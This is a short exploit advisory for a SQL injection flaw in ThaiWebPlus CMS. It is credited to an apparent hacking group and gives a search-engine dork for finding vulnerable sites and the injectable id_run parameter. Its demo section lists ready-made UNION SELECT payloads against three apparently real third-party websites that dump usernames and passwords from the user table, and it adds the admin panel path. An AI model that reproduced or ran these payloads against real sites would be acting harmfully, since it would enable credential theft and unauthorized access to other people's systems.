################################################### # [+] Exploit Title: ThaiWebPlus CMS Sql Injection Vulnerability # [+] Google Dork: Powered by ThaiWebPlus # [+] Exploit Author: Iran Cyber Security Group # [+] Discovered By: Pi.Hack # [+] Vendor Homepage: http://thaiwebplus.com # [+] Version: All version # [+] Tested on: Windows & Linux ################################################### # [+] Exploit: # [+] http://localhost/index.php?Content=product&id_run=[ID]'[Sql Injection] ################################################### # [+] Proof: # [+] http://localhost/index.php?Content=product&id_run=[ID]' [Not loaded] ################################################### # [+] Demo: # [+] http://www.yXingphaiboon-aquarium.com/index.php?Content=product&id_run=-30+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user-- # [+] http://88paXrt.com/index.php?Content=product&id_run=-3+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user-- # [+] http://amXpcooling.com/index.php?Content=service&id_run=-1+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user-- ################################################### # Admin Page: # site.com/_admin/ ################################################### # Contact mail: uid.root@yahoo.com # Skype: uid.root # Home Page : www.Iran-Cyber.Org # Thanks To : root3r | MOHAMAD-NOFOZI | KamraN HellisH | JOK3R | WH!T3_W01F | CRY$I$ BL4CK | And All Members Of Iran-Cyber.Org ###################################################